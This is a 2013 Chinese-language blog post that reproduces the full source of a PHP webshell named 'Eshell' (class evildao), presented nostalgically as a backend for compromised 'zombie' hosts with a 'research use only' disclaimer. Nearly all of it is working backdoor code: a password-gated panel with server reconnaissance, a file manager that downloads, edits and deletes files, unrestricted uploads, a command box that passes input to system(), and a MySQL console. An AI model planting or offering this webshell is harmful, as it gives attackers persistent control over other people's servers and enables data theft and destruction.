Friday, June 7, 2013

php 肉雞後台

肉雞後台

非常的古老,sqlmap互打的時代,明小子,中國菜刀,Havij ,時代眼淚 qq
*研究用途,請勿使用於非法範圍*

<?php
session_start();
class evildao{
function yz_one(){
if(isset($_SESSION['jack']) and $_SESSION['jack']=='ok!'){
$this->program_start();//进入命令识别函数
}else{
$this->yz_two();
}
}
private function yz_two(){
if(isset($_POST['login'])){
$cmd=$_POST['login'];
if(md5($cmd)=='4ff9fc6e4e5d5f590c4f2134a8cc96d1'){
$_SESSION['jack']='ok!';
echo '登陸成功!</br/><script>requesturl();</script>';
}else
{
$fp = fopen("log.txt","a ");
$string = "日期 : "."Y-m-d H:i:s";
$string2 = "位置 : ".$_SERVER['REMOTE_ADDR'];
$string3 ="系統版本 : ".$_SERVER['HTTP_USER_AGENT'];
fwrite($fp,"-------------------------------------");
fwrite($fp,"\r\n");
fwrite ($fp,date($string));
fwrite($fp,"\r\n");
fwrite($fp,$string2 );
fwrite($fp,"\r\n");
fwrite($fp,$string3);
fwrite($fp,"\r\n");
fwrite($fp,"-------------------------------------");
fwrite($fp,"\r\n");
fclose($fp);
}
}else{
echo '<form action="" method="post"><input name="login" type="text" /></form>';
}
}
private function program_start(){
echo '程式啟動完畢...<br/>';
if(isset($_GET['page'])){
switch ($_GET['page']){
case 'systeminfo':
echo '伺服器信息查看模組加載完畢...<br/>';
echo '<a href="?page=systeminfo&show=a">phpinfo</a>&nbsp;|&nbsp;';
echo '<a href="?page=systeminfo&show=b">自定義</a><hr/>';
if(isset($_GET['show']) and $_GET['show']=='a'){
phpinfo();
}
if(isset($_GET['show']) and $_GET['show']=='b'){
echo "檔案路徑:".__FILE__.'<br />';
echo $this->winf(str_replace('//','/',dirname(__FILE__))).'<br/>';
echo "伺服器系統 :".PHP_OS.'<br />';
echo "伺服器域名 :".$_SERVER['SERVER_NAME'].'<br />';
echo "WEB伺服器端口:".$_SERVER['SERVER_PORT'].'<br />';
echo "伺服器时间 :".date("Y年m月d日 h:i:s",time()).'<br />';
echo "伺服器IP地址 :".gethostbyname($_SERVER['SERVER_NAME']).'<br />';
echo "伺服器操作系統文字編碼:".$_SERVER['HTTP_ACCEPT_LANGUAGE'].'<br />';
echo "伺服器解释引擎:".$_SERVER['SERVER_SOFTWARE'].'<br />';
echo "PHP運行方式 :".strtoupper(php_sapi_name()).'<br />';
echo "PHP版本 :".PHP_VERSION.'<br />';
echo "ZEND版本 :".zend_version().'<br />';
echo "伺服器剩餘空间:".intval(diskfreespace(".") / (1024 * 1024)).'MB'.'<br />';
echo "脚本運行可占最大記憶體:".get_cfg_var("memory_limit").'<br />';
echo "脚本上傳檔案大小限制:".get_cfg_var("upload_max_filesize").'<br />';
echo "POST方法提交限制:".get_cfg_var("post_max_size").'<br />';
echo "脚本超时时间 :".get_cfg_var("max_execution_time").'秒<br />';
echo "被鎖定的函數 :".get_cfg_var("disable_functions").'<br />';
echo "动态链接库 :".$this->ginf(get_cfg_var("enable_dl")).'<br />';
echo "自定義全局變數:".$this->ginf(get_cfg_var("register_globals")).'<br />';
echo "顯示错误信息 :".$this->ginf(get_cfg_var("display_errors")).'<br />';
echo "PHP安全模式 :".$this->ginf(get_cfg_var("safe_mode")).'<br />';
echo "FTP檔案传输 :".$this->ginf(get_magic_quotes_gpc("FTP support")).'<br />';
echo"允許使用URL打開檔案:".$this->ginf(get_cfg_var("allow_url_fopen")).'<br />';
echo "SESSION支持 :".$this->ginf(function_exists("session_start")).'<br />';
echo "Socket支持 :".$this->ginf(function_exists("fsockopen")).'<br />';
echo "SNMP 協議 :".$this->ginf(function_exists("snmpget")).'<br />';
echo "MYSQL 數據庫 :".$this->ginf(function_exists("mysql_close")).'<br />';
echo "ODBC 數據庫 :".$this->ginf(function_exists("odbc_close")).'<br />';
echo "Oracle數據庫 :".$this->ginf(function_exists("ora_close")).'<br />';
echo "SQL SERVER數據庫:".$this->ginf(function_exists("mssql_close")).'<br />';
}
break;
case 'lookdir':
$dir=$_GET['dir'];
$wwwrootdir=$_SERVER['DOCUMENT_ROOT'];
echo '網站的主目錄:<a href="?page=lookdir&dir='.urlencode($wwwrootdir).'">'.$wwwrootdir.'</a><br/><br/>';
//if(isset($_GET['downfile'])){$this->c_file($_GET['downfile'],'down');}
if(isset($_GET["delfile"])){$this->c_file($_GET["delfile"],'del');}
if(isset($_GET["editfile"])){$this->c_file($_GET["editfile"],'edit');}
if(isset($_GET["renamefile"])){$this->c_file($_GET["renamefile"],'ren');}
echo '<form action="" method="get">';
echo "請輸入要搜尋的目錄:";
echo '<input type="hidden" name="page" value="lookdir" />';
echo '<input type="text" name="dir">';
echo '<input type="submit" value="打開" />';
echo '</form>';
if (!isset($dir) or empty($dir)){$dir=str_replace('\\','/',dirname(__FILE__));}
echo '<br/>當前目錄:'.$dir.'<br/>................................................................................................<br/>';
$dirs=@opendir($dir);
while ($file=@readdir($dirs)) {
$b=$dir.'/'.$file;
$a=@is_dir($b);
if($a=="1"){
if($file!=".." && $file!=".") {
echo '<a href="?page=lookdir&dir='.urlencode($dir).'/'.urlencode($file).'">'.$file.'</a><br/><br/>';
} else {
if($file==".."){echo '<a href="?page=lookdir&dir='.urlencode($dir).'/..">..</a><br/><br/>';}
}
}
}
echo '<br/>現在目錄下的檔案:<br/>................................................................................................<br/>';
@closedir($dirs);
$dirs=@opendir($dir);
while ($file=@readdir($dirs)) {
$b="$dir/$file";
$a=@is_dir($b);
if($a=="0"){
$size=@filesize("$dir/$file")/1024;
$lastsave=@date("Y-n-d H:i:s",filectime("$dir/$file"));
echo $file.'<br/><br/>最後修改的檔案:'.$lastsave.'&nbsp;|&nbsp;檔案大小:'.$size.'&nbsp;KB&nbsp;<br/><br/>';
echo '<a href="?page=lookdir&downfile='.urlencode($dir).'/'.urlencode($file).'">下载</a>&nbsp;|&nbsp;';
echo '<a href="?page=lookdir&editfile='.urlencode($dir).'/'.urlencode($file).'&dir='.$dir.'">編輯</a>&nbsp;|&nbsp;';
echo '<a href="?page=lookdir&renamefile='.urlencode($dir).'/'.urlencode($file).'">重命名</a>&nbsp;|&nbsp;';
echo '<a href="?page=lookdir&delfile='.urlencode($dir).'/'.urlencode ($file).'">删除</a><br/><br/>';
}
}
@closedir($dirs);
break;
case 'upfile':
echo '<form enctype="multipart/form-data" action="" method="post">';
echo '<input name="upload_file" type="file" /><input type="submit" value="上傳" />';
echo '</form>';
$upload_file=$_FILES['upload_file']['tmp_name'];
$upload_file_name=$_FILES['upload_file']['name'];
$upload_file_size=$_FILES['upload_file']['size'];
if($upload_file){
$file_size_max = 100000*100000;
$store_dir = dirname(__FILE__);
$accept_overwrite = 1;
if ($upload_file_size > $file_size_max) {
echo "檔案大小超過標準!<br/>";
exit;
}
if (file_exists($store_dir ."\\". $upload_file_name) && !$accept_overwrite) {
echo "檔案已存在!<br/>";
exit;
}
if (!move_uploaded_file($upload_file,$store_dir."\\".$upload_file_name)) {
echo "上傳檔案失敗!<br/>";
exit;
}
echo "上傳檔案名:".$_FILES['upload_file']['name']."<br/>";
echo "上傳檔案大小:".$_FILES['upload_file']['size']." Bytes<br/>";
}
break;
case 'cmd':
echo '<form action="" method="post">';
echo '<input type="text" name="cmd"/>';
echo '<input type="submit" value="執行"/><br/>';
echo '<textarea name="textarea" cols="70" rows="15" readonly>';
@system($_POST['cmd']);
echo '</textarea></form>';
break;
case 'changurl':
echo '<form action="" method="post">';
echo '<input type="text" value="';
echo urlencode($_POST['urltext']);
echo '" name="urltext" /></form>';
break;
case 'exmysql':
echo '<form action="" method="post">';
echo '數據庫位置 :<input name="servername" type="text" /><br/>';
echo '帳號 :<input name="username" type="text" /><br/>';
echo '密碼 :<input name="password" type="text" /><br/>';
echo '數據庫名稱 :<input name="dbname" type="text" /><br/>';
echo 'sql執行命令 :<textarea name="query" cols="60" rows="10"></textarea>';
echo '<input type="submit" value="執行" /></form>';
if(isset($_POST['servername']) and isset($_POST['username']) and isset($_POST['password']) and isset($_POST['dbname']) and isset($_POST['query'])){
$servername = $_POST['servername'];
$username = $_POST['username'];
$password = $_POST['password'];
$dbname = $_POST['dbname'];
$dbresult = $_POST['query'];
if ($link=@mysql_connect($servername,$username,$password) and @mysql_select_db($dbname)) {
echo "數據庫连接成功!<br/>";
} else {
echo "數據庫连接失敗!".mysql_error()."<br/>";
}
if (!empty($dbresult)){
$dbresult = @mysql_query($dbresult);
echo ($dbresult) ? "命令執行完畢!" : "執行出错:".mysql_error();
mysql_close();
}
}
break;
case 'login_out':
$_SESSION['jack']='退出!';
echo '退出<br/><script>requesturl();</script>';
break;
}
}
}
//------------------------辅助区域-------------------------------------------------------
private function winf($dir){
$t=tempnam("$dir","evildao.txt");
if ($f=@fopen($t,"w")){
@fclose($f);
@unlink($t);
$t="當前目錄可以寫入!";
}else {
$t="當前目錄不可以寫入!";
}
return $t;
}
private function ginf($t){
if($t==1){$t='NO';}else{$t='OFF';}
return $t;
}
private function c_file($f,$t){
switch ($t){
case 'down':
//...
break;
case 'del':
if(is_file($f)){
$message = (@unlink($f))? "删除成功!" : "貌似錯誤" ;
}else{
$message = "起確定是這個檔案?";
}
echo $message;
break;
case 'edit':
$e=basename($f);
if(empty($_POST['newe'])){
echo '<form action="" method="post">';
$fp=@fopen("$e","r");
$data=@fread($fp,filesize($e));
echo '<textarea name="newe" cols="80" rows="20" >';
echo htmlspecialchars($data);
@fclose($fp);
echo '</textarea><input type="submit" value="編輯"/></form>';
}
if (!empty($_POST['newe'])){
$fp=@fopen("$e","w+");
echo ($result=@fwrite($fp,stripslashes($_POST['newe'])))?"檔案編輯成功!":"檔案編輯似乎失敗了……";
@fclose($fp);
}
break;
case 'ren':
echo '<form action="" method="post">';
echo '檔案新名字:<input type="text" name="newname"/><input type="submit" value="确定"/>';
$oldname=basename($renamefile);
if (@rename($oldname,$_POST['newname'])){
echo '檔案名修改成功!';
}else{
if (!empty($_POST['newname'])){echo '檔案名修改失敗!';}
}
break;
}
}
}//class end
if(isset($_GET['downfile'])){
$filename = basename($_GET['downfile']);
header("Content-Type: application/force-download; name=".$filename);
header("Content-Transfer-Encoding: binary");
header("Content-Disposition: attachment; filename=".$filename);
header("Expires: 0");
header("Cache-Control: no-cache, must-revalidate");
header("Pragma: no-cache");
}
?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>Eshell - by:Jack</title>
<script type="text/JavaScript">
<!--
function msg() {
if (confirm('操作二级提示!')){
return true;
}else{
return false;
}
}
//-->
</script><font color="REd">下午 05:59 2013/1/21</font>
</head>
<body>
<body background="/index.jpg">
<?php
if(isset($_SESSION['jack']) and $_SESSION['jack']=='ok!'){
?>
|&nbsp;<a href="?page=systeminfo"><font color="REd">伺服器訊息查看</a>&nbsp;|&nbsp;
<a href="?page=lookdir"><font color="REd">目錄檔案查看</a></font>&nbsp;|&nbsp;
<a href="?page=upfile"><font color="REd">上傳檔案</a></font>&nbsp;|&nbsp;
<a href="?page=cmd"><font color="REd">WEBshell</a></font>&nbsp;|&nbsp;
<a href="?page=changurl"><font color="REd">URL編碼器</a></font>&nbsp;|&nbsp;
<a href="?page=exmysql"><font color="REd">MySQL</a></font>&nbsp;|&nbsp;
<a href="?page=login_out"><font color="REd">退出</a></font>&nbsp;|&nbsp;
<hr/>
<?php
}
$class = new evildao();
$class->yz_one();
?>
<hr/><br/>
&copy;BY:x213212(Jack)
<br/><br/>
</body>
</html>
view raw bakk.php hosted with ❤ by GitHub
標籤: , ,